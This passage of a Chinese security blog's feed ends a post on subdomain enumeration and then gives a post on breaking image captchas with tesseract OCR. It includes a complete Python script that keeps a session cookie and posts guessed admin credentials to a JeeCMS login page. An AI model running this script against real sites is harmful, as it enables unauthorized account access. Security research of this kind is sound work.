parser.add_argument(<span class="string">"-b"</span>,<span class="string">"--bruteforce"</span>,help=<span class="string">"dns bruteforce"</span>,action=<span class="string">'store_true'</span>)</div><div class="line">    parser.add_argument(<span class="string">"-s"</span>,<span class="string">"--search"</span>,help=<span class="string">"search engine"</span>,action=<span class="string">'store_true'</span>)</div><div class="line">    parser.add_argument(<span class="string">"-a"</span>,<span class="string">"--api"</span>,help=<span class="string">"domain finder api"</span>,action=<span class="string">'store_true'</span>)    </div><div class="line">    args = parser.parse_args()</div><div class="line"></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        run(args)</div><div class="line">    <span class="keyword">except</span> KeyboardInterrupt:</div><div class="line">        logging.info(<span class="string">"Ctrl C - Human Stop"</span>)</div><div class="line">        sys.exit(<span class="number">1</span>)</div></pre></td></tr></table></figure>
<p>GitHub源码： <a href="https://github.com/Evi1CLAY/CoolPool" target="_blank" rel="external">https://github.com/Evi1CLAY/CoolPool</a></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="https://github.com/ring04h/wydomain" target="_blank" rel="external">https://github.com/ring04h/wydomain</a></li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h2&gt;&lt;p&gt;参照猪猪侠的 wydomain 项目写一个简单的二级域名查找的脚本，提供三种方式来收集目标的子域名信息。&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;DNS枚
    
    </summary>
    
    
      <category term="二级域名查找" scheme="http://www.evilclay.com/tags/%E4%BA%8C%E7%BA%A7%E5%9F%9F%E5%90%8D%E6%9F%A5%E6%89%BE/"/>
    
      <category term="DNS枚举" scheme="http://www.evilclay.com/tags/DNS%E6%9E%9A%E4%B8%BE/"/>
    
  </entry>
  
  <entry>
    <title>识别验证码账户暴力破解小记</title>
    <link href="http://www.evilclay.com/2016/12/18/%E8%AF%86%E5%88%AB%E9%AA%8C%E8%AF%81%E7%A0%81%E8%B4%A6%E6%88%B7%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%B0%8F%E8%AE%B0/"/>
    <id>http://www.evilclay.com/2016/12/18/识别验证码账户暴力破解小记/</id>
    <published>2016-12-17T16:21:10.000Z</published>
    <updated>2016-12-17T16:46:58.959Z</updated>
    
    <content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>首先能使用工具重放用户的请求，然后再考虑表单暴力破解。先分析下正常登录通讯流程：</p>
<ol>
<li>用户访问 login 页面  —-&gt;   服务器返回 响应，在头部设置 cookie</li>
<li>用户带着得到的 cookie 去请求验证码图片 —-&gt; 服务器返回验证码图片</li>
<li>用户带着cookie 去 post 登录表单     —-&gt; 服务器根据cookie选定该用户服务器端的验证码与客户端传来的作对比，成功比对其它登录信息</li>
</ol>
<p>由于对验证码功能开发这块不了解，导致初步分析的时候重放POST请求忘记带cookie服务器一直返回内部错误，真是羞涩，好在后面一点点 fuzz 的时候把问题找出来了，所以才有了上面的3个通讯步骤。</p>
<p>在这个实验中，首先要把 <strong>图片验证码识别</strong> 成字符串，然后 <strong>维持cookie</strong> 请求发送 POST 包就可以了，原理很清新。所以能否成功利用很大程度取决于服务器是否使用了足够“操蛋”的验证码，所以说并不是用了验证码，就可以避免口令爆破了。</p>
<h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2><p>需要安装下面的第三方库</p>
<pre><code>sudo apt-get install tesseract-ocr  //  Google的开源验证码识别程序
pip install  pytesseract   // tesseract-ocr 的 py 接口
pip install  Image    // 图片处理库
import requests    //  网络请求库
</code></pre><p>在这里顺带说一句，默认可以识别英文字符，如识别中文的话需要自行搜索下载 tesseract-ocr 的中文语言包放在指定目录里。</p>
<h2 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/python</span></div><div class="line"><span class="comment"># coding:utf-8</span></div><div class="line"><span class="comment"># Author: Anka9080</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> Image</div><div class="line"><span class="keyword">import</span> pytesseract</div><div class="line"></div><div class="line"><span class="comment"># fuck captcha auto login script</span></div><div class="line">HEADERS = &#123;</div><div class="line">	<span class="string">'User-Agent'</span>:<span class="string">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36'</span>,</div><div class="line">	<span class="string">'Referer'</span>:<span class="string">'http://foo.com/jeeadmin/jeecms/login.do'</span></div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span>  <span class="title">FuckCaptchaLogin</span><span class="params">(object)</span>:</span></div><div class="line"></div><div class="line">	<span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></div><div class="line">		self.login_url = <span class="string">'http://foo.com/jeeadmin/jeecms/login.do'</span></div><div class="line">		self.captcha_url = <span class="string">'http://foo.com/captcha.svl'</span></div><div class="line">		self.image_name = <span class="string">'captcha.jpeg'</span></div><div class="line">		self.login()</div><div class="line">		<span class="keyword">pass</span></div><div class="line"></div><div class="line">	<span class="function"><span class="keyword">def</span> <span class="title">download_image</span><span class="params">(self,s)</span>:</span></div><div class="line">		r = s.get(url=self.captcha_url,headers=HEADERS)</div><div class="line">		<span class="keyword">with</span> open(self.image_name,<span class="string">'wb'</span>) <span class="keyword">as</span> f:</div><div class="line">			<span class="keyword">for</span>  chunk <span class="keyword">in</span> r.iter_content(chunk_size=<span class="number">1024</span>):</div><div class="line">				f.write(chunk)</div><div class="line">				f.flush()</div><div class="line">		<span class="keyword">pass</span></div><div class="line"></div><div class="line">	<span class="function"><span class="keyword">def</span>  <span class="title">orc_image</span><span class="params">(self)</span>:</span></div><div class="line">		im =  Image.open(self.image_name)</div><div class="line">		captcha_string = pytesseract.image_to_string(im, lang=<span class="string">'eng'</span>).strip()</div><div class="line">		<span class="keyword">return</span>  captcha_string</div><div class="line"></div><div class="line">	<span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">(self)</span>:</span></div><div class="line">		s = requests.Session()</div><div class="line">		r = s.get(url = self.login_url,headers=HEADERS)</div><div class="line">		r = s.get(url=self.login_url,headers=HEADERS)</div><div class="line">		<span class="keyword">print</span> r.request.headers</div><div class="line">		self.download_image(s)</div><div class="line">		captcha_string = self.orc_image()</div><div class="line">		post_data = &#123;</div><div class="line">			<span class="string">'username'</span>:<span class="string">'admin'</span>,</div><div class="line">			<span class="string">'password'</span>:<span class="string">'admin'</span>,</div><div class="line">			<span class="string">'captcha'</span>:captcha_string,</div><div class="line">			<span class="string">'submit.x'</span>:<span class="string">'20'</span>,</div><div class="line">			<span class="string">'submit.y'</span>:<span class="string">'20'</span>,</div><div class="line">		&#125;</div><div class="line">		r = s.post(url=<span class="string">'http://foo.com/jeeadmin/jeecms/login.do'</span>,headers=HEADERS,data=post_data)</div><div class="line">		<span class="keyword">print</span> r.text</div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">	FuckCaptchaLogin()</div></pre></td></tr></table></figure>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h2&gt;&lt;p&gt;首先能使用工具重放用户的请求，然后再考虑表单暴力破解。先分析下正常登录通讯流程：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;用户访问 login 页面  —
    
    </summary>
    
    
      <category term="验证码识别" scheme="http://www.evilclay.com/tags/%E9%AA%8C%E8%AF%81%E7%A0%81%E8%AF%86%E5%88%AB/"/>
    
      <category term="暴力破解" scheme="http://www.evilclay.com/tags/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/"/>
    
  </entry>
  
</feed>